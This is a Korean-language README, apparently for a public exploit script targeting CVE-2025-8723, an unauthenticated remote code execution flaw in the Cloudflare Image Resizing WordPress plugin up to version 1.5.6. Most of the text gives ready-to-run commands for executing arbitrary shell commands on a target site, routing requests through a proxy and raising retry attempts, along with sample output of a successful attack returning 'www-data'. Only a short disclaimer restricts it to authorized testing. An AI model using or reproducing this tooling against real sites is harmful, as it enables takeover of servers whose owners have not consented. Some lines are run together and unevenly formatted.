
Cloudflare Image Resizing <= 1.5.6 | 인증되지 않은 원격 코드 실행
WordPress용 Cloudflare Image Resizing 플러그인(버전 <= 1.5.6)은 인증 누락 취약점으로 인해 rest_pre_dispatch 훅을 통해 인증되지 않은 원격 코드 실행(RCE) 을 허용합니다.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H설명:
플러그인의 REST API 엔드포인트가 사용자를 인증하지 못하고hook_rest_pre_dispatch()메서드에서 입력을 부적절하게 살균합니다. 이 결함으로 인해 공격자는 로그인 없이 악의적인 요청을 구성하여 임의의 PHP 코드를 주입하고 실행할 수 있습니다.
readme.txt 파일을 파싱하여 플러그인 취약점 자동 탐지whoami, 사용자가 다른 명령 지정 가능wp-content/plugins/cf-image-resizing/readme.txt 가져오기-c "id"--proxy를 사용하여 프록시를 통해 요청 전송 (예: BurpSuite)python3 CVE-2025-8723.py -u http://target.com/
whoami사용자 정의 명령 지정:
python3 CVE-2025-8723.py -u http://target.com/ -c "id"
프록시 사용 (예: BurpSuite):
python3 CVE-2025-8723.py -u http://target.com/ --proxy http://127.0.0.1:8080
고급 헤더 시도 횟수 증가 (기본값 5):
python3 CVE-2025-8723.py -u http://target.com/ --attempts 10
[+] CVE-2025-8723 Exploit | by Khaled Alenazi (Nxploited)
[+] Detected version: 1.5.6
[+] Target is vulnerable (<=1.5.6). Proceeding with exploit.
[*] Trying minimal headers (only Content-Type)...
[=] Minimal Headers | Status: 200
www-data
[+] Exploit worked with this method!
이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용됩니다.
개발자는 이 코드의 오용이나 손해에 대해 책임을 지지 않습니다.
작성자: Khaled Alenazi (Nxploited)